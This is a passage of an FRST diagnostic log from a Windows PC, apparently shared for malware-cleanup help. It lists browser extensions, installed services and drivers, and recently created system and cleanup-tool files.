Chrome:
=======
CHR Profile: C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-07-07]
CHR Extension: (Google Drive) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-07-07]
CHR Extension: (YouTube) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-07-07]
CHR Extension: (Google Search) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-07-07]
CHR Extension: (Website Logon) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\kanflfepiobnpjbljmngfgegijhdpljm [2014-07-07]
CHR Extension: (Google Wallet) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-07-07]
CHR Extension: (Gmail) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-07-07]
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\Exts\Chrome.crx [2015-12-24]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\Exts\Chrome.crx [2015-12-24]
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [kanflfepiobnpjbljmngfgegijhdpljm] - C:\Program Files (x86)\HP SimplePass\tschrome.crx [2013-04-01]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 EgisTec Service; C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisService.exe [689008 2010-03-25] (Egis Technology Inc. )
R2 Fitbit Connect; C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe [5738528 2014-11-07] (Fitbit, Inc.) [File not signed]
R2 FPLService; C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe [1641768 2013-06-07] (HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe [46904 2013-12-17] (Hewlett-Packard Company)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [330136 2015-10-30] (Intel Corporation)
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [140456 2012-03-27] ()
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [128896 2012-07-17] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)
R2 NS; C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\NS.exe [282016 2015-11-20] (Symantec Corporation)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2015-07-17] (Synaptics Incorporated)
S3 TrueService; C:\Program Files\Common Files\AuthenTec\TrueService.exe [401856 2013-01-07] (AuthenTec, Inc.)
R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [28160 2012-09-06] () [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
S2 EraserSvc11511; "C:\Program Files (x86)\Norton Security\Engine\22.5.4.24\NS.exe" /h ccCommon [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\BASHDefs\20160213.003\BHDrvx64.sys [1665608 2015-10-08] (Symantec Corporation)
R1 bsdriver; C:\WINDOWS\system32\drivers\bsdriver.sys [34712 2015-12-18] ()
R1 ccSet_NS; C:\Windows\system32\drivers\NSx64\1605050.00F\ccSetx64.sys [173808 2015-09-23] (Symantec Corporation)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [498512 2015-12-23] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [157520 2015-12-23] (Symantec Corporation)
R1 IDSVia64; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\IPSDefs\20160308.002\IDSvia64.sys [767224 2016-02-15] (Symantec Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\VirusDefs\20160309.020\ENG64.SYS [138488 2015-12-23] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\VirusDefs\20160309.020\EX64.SYS [2148080 2015-12-23] (Symantec Corporation)
R3 netr28x; C:\Windows\system32\DRIVERS\netr28x.sys [2554528 2015-06-12] (MediaTek Inc.)
S3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [310528 2015-06-05] (Realtek Semiconductor Corp.)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [589824 2015-10-30] (Realtek                                            )
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [41272 2012-08-24] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-07-17] (Synaptics Incorporated)
R1 SRTSP; C:\Windows\System32\Drivers\NSx64\1605050.00F\SRTSP64.SYS [928496 2015-11-11] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\NSx64\1605050.00F\SRTSPX64.SYS [50936 2015-09-23] (Symantec Corporation)
R0 SymEFASI; C:\Windows\System32\drivers\NSx64\1605050.00F\SYMEFASI64.SYS [1621232 2015-11-11] (Symantec Corporation)
S4 SymELAM; C:\Windows\system32\drivers\NSx64\1605050.00F\SymELAM.sys [24192 2015-09-23] (Symantec Corporation)
R3 SymEvent; C:\WINDOWS\system32\Drivers\SYMEVENT64x86.SYS [111344 2015-12-24] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\NSx64\1605050.00F\Ironx64.SYS [297720 2015-09-23] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\NSx64\1605050.00F\SYMNETS.SYS [577768 2015-11-11] (Symantec Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2013-02-08] (Hewlett-Packard Development Company, L.P.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-09 17:52 - 2016-03-09 17:52 - 00024142 _____ C:\Users\levilaing\Desktop\FRST.txt
2016-03-09 17:47 - 2016-03-09 17:47 - 00002268 _____ C:\Users\levilaing\Desktop\JRT.txt
2016-03-09 17:42 - 2016-03-09 17:42 - 01609216 _____ (Malwarebytes) C:\Users\levilaing\Downloads\JRT.exe
2016-03-09 17:27 - 2016-03-09 17:33 - 00000000 ____D C:\Program Files (x86)\AdwCleaner
2016-03-09 17:26 - 2016-03-09 17:26 - 01524224 _____ C:\Users\levilaing\Downloads\adwcleaner_5.101.exe
2016-03-09 16:45 - 2016-03-09 16:45 - 00019460 _____ C:\Users\levilaing\Desktop\Fixlog.txt
2016-03-08 17:33 - 2016-03-08 17:34 - 00072040 _____ C:\Users\levilaing\Downloads\FRST.txt
2016-03-08 17:33 - 2016-03-08 17:33 - 02374144 _____ (Farbar) C:\Users\levilaing\Desktop\FRST64.exe
2016-03-08 17:29 - 2016-03-08 17:32 - 00000253 _____ C:\Users\levilaing\Downloads\Search.txt
2016-03-08 17:16 - 2016-03-09 17:52 - 00000000 ____D C:\FRST
2016-03-08 16:37 - 2016-03-08 16:38 - 00041639 _____ C:\Users\levilaing\Downloads\Addition.txt
2016-03-01 13:31 - 2016-03-01 13:31 - 00000860 _____ C:\WINDOWS\system32\Drivers\etc\hosts.bak
2016-03-01 13:26 - 2016-03-01 13:50 - 00000000 ____D C:\Users\levilaing\AppData\Local\NPE
2016-03-01 12:58 - 2016-02-23 05:27 - 02654872 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-03-01 12:58 - 2016-02-23 05:23 - 00713568 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-03-01 12:58 - 2016-02-23 05:22 - 01173344 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-03-01 12:58 - 2016-02-23 05:15 - 00513888 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-03-01 12:58 - 2016-02-23 04:32 - 08705672 _____ (Microsoft Corp.) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-03-01 12:58 - 2016-02-23 04:31 - 00408120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2016-03-01 12:58 - 2016-02-23 04:21 - 22564328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-03-01 12:58 - 2016-02-23 04:21 - 06606568 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-03-01 12:58 - 2016-02-23 03:45 - 02773096 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11.dll
2016-03-01 12:58 - 2016-02-23 03:45 - 01998176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-03-01 12:58 - 2016-02-23 03:45 - 00576352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-03-01 12:58 - 2016-02-23 03:38 - 06952088 _____ (Microsoft Corp.) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-03-01 12:58 - 2016-02-23 03:27 - 21124344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-03-01 12:58 - 2016-02-23 03:26 - 05241984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2016-03-01 12:58 - 2016-02-23 02:58 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2016-03-01 12:58 - 2016-02-23 02:29 - 00591872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll
2016-03-01 12:58 - 2016-02-23 02:28 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2016-03-01 12:58 - 2016-02-23 02:09 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-03-01 12:58 - 2016-02-23 02:00 - 02624512 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-03-01 12:58 - 2016-02-23 01:58 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2016-03-01 12:58 - 2016-02-23 01:30 - 01731584 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-03-01 12:58 - 2016-02-23 01:24 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-03-01 12:58 - 2016-02-23 00:52 - 11545600 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-03-01 12:58 - 2016-02-23 00:50 - 22396416 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-03-01 12:58 - 2016-02-23 00:50 - 09919488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-03-01 12:58 - 2016-02-23 00:40 - 24603136 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-03-01 12:58 - 2016-02-23 00:39 - 13382656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-03-01 12:58 - 2016-02-23 00:39 - 02581504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-03-01 12:58 - 2016-02-23 00:36 - 19341312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-03-01 12:58 - 2016-02-23 00:36 - 18680320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-03-01 12:58 - 2016-02-23 00:36 - 12125696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-03-01 12:58 - 2016-02-23 00:33 - 14254080 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-03-01 12:58 - 2016-02-08 21:24 - 00641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-03-01 12:58 - 2016-02-08 21:04 - 01946624 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-03-01 12:57 - 2016-02-23 05:29 - 01030416 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-03-01 12:57 - 2016-02-23 05:29 - 00874968 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-03-01 12:57 - 2016-02-23 05:27 - 07475040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-03-01 12:57 - 2016-02-23 05:27 - 01317640 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-03-01 12:57 - 2016-02-23 05:27 - 01141504 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-03-01 12:57 - 2016-02-23 05:25 - 02152288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2016-03-01 12:57 - 2016-02-23 05:25 - 01818696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-03-01 12:57 - 2016-02-23 05:25 - 00563552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys
2016-03-01 12:57 - 2016-02-23 05:15 - 00779384 _____ (Microsoft Corporation) C:\WINDOWS\system32\taskschd.dll
2016-03-01 12:57 - 2016-02-23 05:09 - 01614176 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-03-01 12:57 - 2016-02-23 05:08 - 00989536 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-03-01 12:57 - 2016-02-23 04:34 - 01859960 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-03-01 12:57 - 2016-02-23 04:34 - 01542816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-03-01 12:57 - 2016-02-23 04:33 - 00696160 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-03-01 12:57 - 2016-02-23 04:33 - 00389992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 02544264 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 01152328 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 01062480 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 00498448 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 00369912 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2016-03-01 12:57 - 2016-02-23 04:31 - 01017032 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00847656 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00819648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00536256 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00476728 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2016-03-01 12:57 - 2016-02-23 04:25 - 03671888 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-03-01 12:57 - 2016-02-23 04:22 - 00572272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\taskschd.dll
2016-03-01 12:57 - 2016-02-23 04:17 - 00146272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
2016-03-01 12:57 - 2016-02-23 03:49 - 00216416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2016-03-01 12:57 - 2016-02-23 03:45 - 00394080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-03-01 12:57 - 2016-02-23 03:45 - 00259336 _____ (Microsoft Corporation) C:\WINDOWS\system32\sqmapi.dll
2016-03-01 12:57 - 2016-02-23 03:44 - 00640984 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2016-03-01 12:57 - 2016-02-23 03:44 - 00147808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2016-03-01 12:57 - 2016-02-23 03:40 - 00430944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2016-03-01 12:57 - 2016-02-23 03:39 - 00502112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 02180136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00980352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00895080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00882720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00709176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00450912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00420928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2016-03-01 12:57 - 2016-02-23 03:37 - 00713824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:32 - 00791744 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-03-01 12:57 - 2016-02-23 03:30 - 02919320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-03-01 12:57 - 2016-02-23 03:27 - 00376536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MediaControl.dll
2016-03-01 12:57 - 2016-02-23 03:25 - 00534368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2016-03-01 12:57 - 2016-02-23 03:20 - 01139712 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblGameSave.dll
2016-03-01 12:57 - 2016-02-23 03:20 - 00238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2016-03-01 12:57 - 2016-02-23 03:19 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xinputhid.sys
2016-03-01 12:57 - 2016-02-23 03:17 - 00649216 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2016-03-01 12:57 - 2016-02-23 03:12 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\provpackageapidll.dll
2016-03-01 12:57 - 2016-02-23 03:10 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll
2016-03-01 12:57 - 2016-02-23 03:07 - 00037376 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2016-03-01 12:57 - 2016-02-23 03:07 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll
2016-03-01 12:57 - 2016-02-23 03:06 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\flvprophandler.dll
2016-03-01 12:57 - 2016-02-23 03:01 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rasl2tp.sys
2016-03-01 12:57 - 2016-02-23 03:00 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseDesktopAppMgmtCSP.dll
2016-03-01 12:57 - 2016-02-23 03:00 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll
2016-03-01 12:57 - 2016-02-23 02:58 - 00187744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2016-03-01 12:57 - 2016-02-23 02:58 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininetlui.dll
2016-03-01 12:57 - 2016-02-23 02:58 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\irmon.dll
2016-03-01 12:57 - 2016-02-23 02:57 - 00199168 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-03-01 12:57 - 2016-02-23 02:56 - 02186864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11.dll
2016-03-01 12:57 - 2016-02-23 02:55 - 00221600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sqmapi.dll
2016-03-01 12:57 - 2016-02-23 02:55 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2016-03-01 12:57 - 2016-02-23 02:54 - 00539256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2016-03-01 12:57 - 2016-02-23 02:54 - 00141664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2016-03-01 12:57 - 2016-02-23 02:53 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\srpapi.dll
2016-03-01 12:57 - 2016-02-23 02:53 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
2016-03-01 12:57 - 2016-02-23 02:52 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDMAppInstaller.exe
2016-03-01 12:57 - 2016-02-23 02:50 - 00159232 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-03-01 12:57 - 2016-02-23 02:48 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll
2016-03-01 12:57 - 2016-02-23 02:48 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeBrokerClient.dll
2016-03-01 12:57 - 2016-02-23 02:40 - 00074240 _____ (Microsoft Corporation) C:\WINDOWS\system32\SMSRouter.dll
2016-03-01 12:57 - 2016-02-23 02:39 - 00178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2016-03-01 12:57 - 2016-02-23 02:38 - 00320000 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSFlacDecoder.dll
2016-03-01 12:57 - 2016-02-23 02:38 - 00287712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MediaControl.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll
2016-03-01 12:57 - 2016-02-23 02:36 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\QuickActionsDataModel.dll
2016-03-01 12:57 - 2016-02-23 02:34 - 00305664 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifiprofilessettinghandler.dll
2016-03-01 12:57 - 2016-02-23 02:34 - 00189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2016-03-01 12:57 - 2016-02-23 02:33 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\system32\MBMediaManager.dll
2016-03-01 12:57 - 2016-02-23 02:32 - 00414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-03-01 12:57 - 2016-02-23 02:31 - 00463360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2016-03-01 12:57 - 2016-02-23 02:30 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultsvc.dll
2016-03-01 12:57 - 2016-02-23 02:28 - 00685568 _____ (Microsoft Corporation) C:\WINDOWS\system32\scapi.dll
2016-03-01 12:57 - 2016-02-23 02:27 - 00307712 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbmon.dll
2016-03-01 12:57 - 2016-02-23 02:26 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDEServer.exe
2016-03-01 12:57 - 2016-02-23 02:25 - 00288768 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultcli.dll
2016-03-01 12:57 - 2016-02-23 02:25 - 00229376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2016-03-01 12:57 - 2016-02-23 02:23 - 00412672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll
2016-03-01 12:57 - 2016-02-23 02:22 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2016-03-01 12:57 - 2016-02-23 02:22 - 00451584 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00847360 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00606720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00493568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmkvsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00330240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-03-01 12:57 - 2016-02-23 02:19 - 00948736 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2016-03-01 12:57 - 2016-02-23 02:19 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2016-03-01 12:57 - 2016-02-23 02:18 - 00557056 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2016-03-01 12:57 - 2016-02-23 02:14 - 00828928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2016-03-01 12:57 - 2016-02-23 02:14 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2016-03-01 12:57 - 2016-02-23 02:13 - 00915456 _____ (Microsoft Corporation) C:\WINDOWS\system32\configurationclient.dll
2016-03-01 12:57 - 2016-02-23 02:13 - 00286720 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2016-03-01 12:57 - 2016-02-23 02:12 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-03-01 12:57 - 2016-02-23 02:11 - 01224704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2016-03-01 12:57 - 2016-02-23 02:11 - 00587776 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2016-03-01 12:57 - 2016-02-23 02:10 - 00997376 _____ (Microsoft Corporation) C:\WINDOWS\system32\schedsvc.dll
2016-03-01 12:57 - 2016-02-23 02:10 - 00474624 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupShim.dll
2016-03-01 12:57 - 2016-02-23 02:09 - 01390592 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-03-01 12:57 - 2016-02-23 02:09 - 00988160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-03-01 12:57 - 2016-02-23 02:09 - 00870400 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
